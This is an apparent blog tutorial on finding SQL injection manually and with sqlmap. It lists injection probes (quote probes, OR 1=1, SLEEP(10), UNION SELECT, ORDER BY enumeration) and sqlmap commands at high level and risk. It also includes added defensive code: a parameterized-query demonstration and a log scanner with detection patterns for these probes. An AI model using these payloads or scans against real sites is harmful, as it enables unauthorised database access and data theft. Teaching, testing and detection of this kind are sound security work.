SQL INJECTION is a web application vulnerability in which we give input that is included in the web site's database query, so the database executes our injected query and returns output according to it.
HOW TO FIND SQL INJECTION MANUALLY
There are 4 steps to find SQL Injection.
1. Find the INJECTION POINT.
2. IDENTIFY VULNERABILITY.
3. BALANCE THE QUERY.
4. INJECT SQLI QUERIES or PAYLOAD.
LET’S UNDERSTAND THESE 4 STEPS ONE BY ONE
STEP 1. FIND THE INJECTION POINT
Find the input that is passed to the website's database and produces output according to our query.
For Example
1. GET BASED
https://any.com/?id=1 (the value after "=" is the injection point)
In the background, the query may look like: SELECT ... WHERE id = (1)
2. POST BASED
Any HTML form whose input may end up in an SQL query, like:-
a. Signup Page/Login page
b. Forgot Password page
c. Search Page
3. HEADER BASED
Some HEADERS
a. Referer
b. User-Agent
c. Location
d. Host
4. Cookie Based
Find the cookie parameter like:-
Cookie: username = XYZ
STEP 2. IDENTIFY VULNERABILITY
First give a backslash "\" at the SQLi point, then find out which type of error the database returns to you. Also try ' | " | ') | ") to provoke an error.
1. Error based
In this case the database returns an error to us containing useful information about the database structure.
2. Union Based
The UNION keyword is used to retrieve information from another table of the database. It works by appending the rows of our SELECT to the result of the application's own query, so both results are returned together.
like:- "SELECT x, y FROM tableA UNION SELECT h, k FROM tableB"
3. Blind Boolean Based
On Login page :
User_Id : XYZ* (the * marks the injection point)
Try these after 'Z':
a. And 1=1 (True)
b. OR 1=1 (True)
c. And 1=2 (False)
d. OR 1=2 (False)
4. Blind time based
a. AND SLEEP(10) - if the response is delayed, the parameter is vulnerable
b. OR SLEEP(10) - if the response is delayed, the parameter is vulnerable
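To see why the error-based and Boolean-based probes above behave as they do, and what the fix looks like, here is an added example (not from the original post) that builds a constructed in-memory SQLite table and puts a string-concatenated login query beside a parameterized one. The table, user row and function names are my own assumptions; the payloads are the ones the post lists (a lone quote, AND 1=1 / AND 1=2, OR 1=1 followed by a `--` comment).

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the site's real one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL text by concatenation: the input becomes part of the query."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Binds the values as parameters: the SQL text is fixed, the input is only data,
    so quotes, AND/OR and comment markers in the input are never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def error_leak(conn, username):
    """Return the raw database error the concatenated query raises for this
    input, or None. An application that echoes this text to the browser is
    exactly what the 'error based' step relies on; returning a generic message
    and logging the real error server-side removes that signal."""
    try:
        login_vulnerable(conn, username, "pw")
    except sqlite3.Error as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, real creds      :", login_vulnerable(db, "alice", "s3cret"))
    print("vulnerable, OR 1=1 --       :", login_vulnerable(db, "x' OR 1=1 --", "wrong"))
    print("vulnerable, AND 1=1 --      :", login_vulnerable(db, "alice' AND 1=1 --", "wrong"))
    print("vulnerable, AND 1=2 --      :", login_vulnerable(db, "alice' AND 1=2 --", "wrong"))
    print("vulnerable, lone quote error:", error_leak(db, "'"))
    print("safe, OR 1=1 --             :", login_safe(db, "x' OR 1=1 --", "wrong"))
    print("safe, real creds            :", login_safe(db, "alice", "s3cret"))
```

The two login functions receive identical input; only the parameterized one stays correct, because the database never has to guess where the data ends and the query begins. The same binding pattern applies to the GET, POST, header and cookie sources listed in step 1.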
STEP 3. BALANCE THE QUERY.
First you have to close the website's own database query, then enter your injection, then comment out the rest of the query, like:-
User_Name :- "XYZ" ___ (the blank is filled with one of the comment sequences below)
a. -- + (the "+" decodes to the space MySQL requires after "--")
b. -- followed by a space
c. #
d. sometimes only a space
Once the query is balanced, you can try your payloads.
STEP 4. INJECT SQLI QUERIES or PAYLOAD.
1. Find out the number of columns by using:-
a. order by 1
b. order by 2
c. order by 3
Try them one by one like that.
2. At the right number of columns you receive no error, and here boom!!!! Let's assume you got no error on "order by 3".
3. Now find the reflected columns with a SELECT query like:-
union all select 1,2,3,...,n (n = the column count you found; 1,2,3 when you found 3 columns)
NOW TRY SQL INJECTION WITH THE AUTOMATED TOOL SQLMAP
INSTALL SQLMAP FROM GITHUB
$ git clone https://github.com/sqlmapproject/sqlmap
1. GET BASED
Command for GET Based SQLI
- Basic Command
$ python3 sqlmap.py -u "URL" --batch --banner
Read sqlmap's full help
$ python3 sqlmap.py -hh
- Advanced Command
$ python3 sqlmap.py -u "URL" --batch --banner --level=5 --risk=3
2. Automation of SQLI POST Based | Header Based | Cookie Based
- First, capture the request in Burp Suite and add "*" at the parameter you want to test.
- Save the request to a .txt file in the sqlmap directory.
- Basic Command
$ python3 sqlmap.py -r file_name.txt --batch --banner
- Advanced Command
$ python3 sqlmap.py -r file_name.txt --batch --banner --level=5 --risk=3
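Every probe described in steps 2 to 4 and every sqlmap run leaves traces in the web server's access log. As an added example (not part of the original post, and not code from the sqlmap project), the following Python scans constructed Apache combined-format log lines for the patterns this post uses: quote/backslash probes, `order by N` column counting, `union ... select`, `AND/OR 1=1` tautologies, `SLEEP(n)`, and sqlmap's default User-Agent. The sample lines, IPs and rule names are constructed; the assumption that sqlmap's default User-Agent starts with "sqlmap/" is noted in the code.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:10:00:02 +0000] "GET /?id=1%27 HTTP/1.1" 500 88 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:10:00:03 +0000] "GET /?id=1+order+by+3-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:10:00:04 +0000] "GET /?id=1+union+all+select+1,2,3-- HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:10:00:05 +0000] "GET /?id=1+AND+SLEEP(10) HTTP/1.1" 200 512 "-" "sqlmap/1.8 (https://sqlmap.org)"
198.51.100.7 - - [10/May/2024:10:00:06 +0000] "GET /search?q=order+form HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Fields of the combined log format we need: client IP, request path, status, User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Rules are matched against the URL-decoded path, so %27 is seen as the quote it decodes to
# and "+" as the space it stands for. Each rule mirrors one probe from the manual steps.
PATH_RULES = [
    ("quote-probe", re.compile(r"""['"\\]\)?(?:$|&|\s|--|#)""")),            # step 2: ' " \ ') ")
    ("order-by-enumeration", re.compile(r"\border\s+by\s+\d+", re.I)),        # step 4: order by N
    ("union-select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),   # step 4: union select
    ("boolean-tautology", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)), # step 2: and/or 1=1
    ("time-based", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),             # step 2: sleep(n)
]
# Assumption: sqlmap's default User-Agent begins with "sqlmap/". A tester who
# changes it will not trigger this rule, so it corroborates rather than decides.
UA_RULES = [("sqlmap-user-agent", re.compile(r"^sqlmap/", re.I))]


def scan_line(line):
    """Return a finding dict for one log line, or None when no rule matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote_plus(m.group("path"))
    rules = [name for name, rx in PATH_RULES if rx.search(path)]
    rules += [name for name, rx in UA_RULES if rx.search(m.group("ua"))]
    if not rules:
        return None
    return {"ip": m.group("ip"), "path": path,
            "status": int(m.group("status")), "rules": rules}


def scan_log(text):
    """Scan a whole log text and keep only the lines that matched a rule."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['status']} {f['path']!r} -> {', '.join(f['rules'])}")
```

The status code is kept in each finding because a quote probe followed by a 500 response (as in the second sample line) is a strong sign that a database error reached the handler, which is the condition the error-based step looks for. The last sample line shows why the patterns insist on whole keywords: a search for "order form" is not an `order by` probe.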
Follow me on:-
Twitter:- https://twitter.com/MrVoidCG
Instagram:- https://www.instagram.com/chaman_gola/